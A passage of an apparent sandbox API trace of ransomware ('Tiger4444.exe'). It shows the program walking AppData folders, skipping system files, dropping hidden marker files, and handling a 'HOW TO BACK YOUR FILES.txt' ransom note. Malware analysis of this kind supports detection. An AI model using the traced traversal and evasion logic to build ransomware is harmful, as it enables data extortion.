nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.801] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.801] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.801] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3e2133a4, ftCreationTime.dwHighDateTime=0x1d32720, ftLastAccessTime.dwLowDateTime=0xe4c6308a, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe4c6308a, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 1 [0052.801] lstrcmpiW (lpString1="Quick Launch", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.801] lstrcmpiW (lpString1="Quick Launch", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.801] lstrcmpiW (lpString1="Quick Launch", lpString2="Tiger4444.exe") returned -1 [0052.801] lstrcmpiW (lpString1="Quick Launch", lpString2=".") returned 1 [0052.801] lstrcmpiW (lpString1="Quick Launch", lpString2="..") returned 1 [0052.801] lstrcmpiW (lpString1="Quick Launch", lpString2="windows") returned -1 [0052.801] lstrcmpiW (lpString1="Quick Launch", lpString2="bootmgr") returned 1 [0052.801] lstrcmpiW (lpString1="Quick Launch", lpString2="pagefile.sys") returned 1 [0052.801] lstrcmpiW (lpString1="Quick Launch", lpString2="boot") returned 1 [0052.801] lstrcmpiW (lpString1="Quick Launch", lpString2="ids.txt") returned 1 [0052.801] lstrcmpiW (lpString1="Quick Launch", lpString2="NTUSER.DAT") returned 1 [0052.801] lstrcpyW (in: lpString1=0x30aeb20, lpString2="Quick Launch" | out: lpString1="Quick Launch") returned="Quick Launch" [0052.801] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", dwFileAttributes=0x10) returned 1 [0052.802] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66620 [0052.802] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x92) returned 0xc84c28 [0052.802] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66628 | out: ListHead=0xc66828, ListEntry=0xc66628) returned 0xc66308 [0052.802] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd38548cf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x43087f08, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UserData", cAlternateFileName="")) returned 1 [0052.802] lstrcmpiW (lpString1="UserData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.802] lstrcmpiW (lpString1="UserData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.802] lstrcmpiW (lpString1="UserData", lpString2="Tiger4444.exe") returned 1 [0052.802] lstrcmpiW (lpString1="UserData", lpString2=".") returned 1 [0052.802] lstrcmpiW (lpString1="UserData", lpString2="..") returned 1 [0052.802] lstrcmpiW (lpString1="UserData", lpString2="windows") returned -1 [0052.802] lstrcmpiW (lpString1="UserData", lpString2="bootmgr") returned 1 [0052.802] lstrcmpiW (lpString1="UserData", lpString2="pagefile.sys") returned 1 [0052.802] lstrcmpiW (lpString1="UserData", lpString2="boot") returned 1 [0052.802] lstrcmpiW (lpString1="UserData", lpString2="ids.txt") returned 1 [0052.802] lstrcmpiW (lpString1="UserData", lpString2="NTUSER.DAT") returned 1 [0052.802] lstrcpyW (in: lpString1=0x30aeb20, lpString2="UserData" | out: lpString1="UserData") returned="UserData" [0052.802] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66660 [0052.802] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8a) returned 0xc857d0 [0052.802] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66668 | out: ListHead=0xc66828, ListEntry=0xc66668) returned 0xc66628 [0052.802] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd38548cf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x43087f08, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UserData", cAlternateFileName="")) returned 0 [0052.802] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0052.802] lstrcpyW (in: lpString1=0x30aeb20, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.802] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\internet explorer\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a8 [0052.802] CreateFileMappingW (hFile=0x2a8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0052.803] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xc30000 [0052.804] UnmapViewOfFile (lpBaseAddress=0xc30000) returned 1 [0052.804] CloseHandle (hObject=0x2b8) returned 1 [0052.804] CloseHandle (hObject=0x2a8) returned 1 [0052.804] GetCurrentThreadId () returned 0xfa8 [0052.804] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66668 [0052.804] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData" [0052.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc857d0 | out: hHeap=0xc50000) returned 1 [0052.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66660 | out: hHeap=0xc50000) returned 1 [0052.804] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData" [0052.804] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\" [0052.804] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\.BFC0E91B00AE8A0620D3" [0052.804] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a8 [0052.805] WriteFile (in: hFile=0x2a8, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.812] FlushFileBuffers (hFile=0x2a8) returned 1 [0052.813] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.813] CloseHandle (hObject=0x2a8) returned 1 [0052.813] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData") returned 68 [0052.813] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.813] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd38548cf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x847eafe8, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72ec8 [0052.813] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.813] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.813] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.814] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.814] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd38548cf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x847eafe8, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.814] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.814] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.814] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.814] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.814] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.814] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x847eafe8, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x847eafe8, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x847eafe8, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.814] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.814] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.814] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43087f08, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x43087f08, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0052.814] lstrcmpiW (lpString1="Low", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.814] lstrcmpiW (lpString1="Low", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.814] lstrcmpiW (lpString1="Low", lpString2="Tiger4444.exe") returned -1 [0052.814] lstrcmpiW (lpString1="Low", lpString2=".") returned 1 [0052.814] lstrcmpiW (lpString1="Low", lpString2="..") returned 1 [0052.814] lstrcmpiW (lpString1="Low", lpString2="windows") returned -1 [0052.814] lstrcmpiW (lpString1="Low", lpString2="bootmgr") returned 1 [0052.814] lstrcmpiW (lpString1="Low", lpString2="pagefile.sys") returned -1 [0052.814] lstrcmpiW (lpString1="Low", lpString2="boot") returned 1 [0052.814] lstrcmpiW (lpString1="Low", lpString2="ids.txt") returned 1 [0052.814] lstrcmpiW (lpString1="Low", lpString2="NTUSER.DAT") returned -1 [0052.814] lstrcpyW (in: lpString1=0x30aeb32, lpString2="Low" | out: lpString1="Low") returned="Low" [0052.814] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66660 [0052.814] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x92) returned 0xc85128 [0052.814] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66668 | out: ListHead=0xc66828, ListEntry=0xc66668) returned 0xc66628 [0052.814] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43087f08, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x43087f08, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 0 [0052.814] FindClose (in: hFindFile=0xc72ec8 | out: hFindFile=0xc72ec8) returned 1 [0052.814] lstrcpyW (in: lpString1=0x30aeb32, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.814] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a8 [0052.815] CreateFileMappingW (hFile=0x2a8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0052.815] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xc30000 [0052.816] UnmapViewOfFile (lpBaseAddress=0xc30000) returned 1 [0052.816] CloseHandle (hObject=0x2b8) returned 1 [0052.816] CloseHandle (hObject=0x2a8) returned 1 [0052.816] GetCurrentThreadId () returned 0xfa8 [0052.816] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66668 [0052.816] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low" [0052.816] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc85128 | out: hHeap=0xc50000) returned 1 [0052.816] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66660 | out: hHeap=0xc50000) returned 1 [0052.816] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low" [0052.816] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\" [0052.816] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\.BFC0E91B00AE8A0620D3" [0052.816] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a8 [0052.823] WriteFile (in: hFile=0x2a8, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.825] FlushFileBuffers (hFile=0x2a8) returned 1 [0052.826] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.827] CloseHandle (hObject=0x2a8) returned 1 [0052.827] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low") returned 72 [0052.827] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.827] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43087f08, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x84811156, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e48 [0052.827] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.827] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.827] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.827] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.827] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43087f08, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x84811156, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.827] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.827] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.827] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.827] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.827] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.827] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x84811156, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x84811156, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x84811156, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.827] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.827] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.827] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x84811156, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x84811156, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x84811156, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.827] FindClose (in: hFindFile=0xc72e48 | out: hFindFile=0xc72e48) returned 1 [0052.828] lstrcpyW (in: lpString1=0x30aeb3a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.828] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a8 [0052.828] CreateFileMappingW (hFile=0x2a8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0052.828] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xc30000 [0052.829] UnmapViewOfFile (lpBaseAddress=0xc30000) returned 1 [0052.829] CloseHandle (hObject=0x2b8) returned 1 [0052.829] CloseHandle (hObject=0x2a8) returned 1 [0052.829] GetCurrentThreadId () returned 0xfa8 [0052.829] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66628 [0052.829] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" [0052.829] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc84c28 | out: hHeap=0xc50000) returned 1 [0052.829] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66620 | out: hHeap=0xc50000) returned 1 [0052.829] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" [0052.829] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\" [0052.829] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\.BFC0E91B00AE8A0620D3" [0052.829] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a8 [0052.830] WriteFile (in: hFile=0x2a8, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0053.015] FlushFileBuffers (hFile=0x2a8) returned 1 [0053.024] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.024] CloseHandle (hObject=0x2a8) returned 1 [0053.027] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned 72 [0053.027] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.027] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e2133a4, ftCreationTime.dwHighDateTime=0x1d32720, ftLastAccessTime.dwLowDateTime=0xe4c6308a, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0x84811156, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", 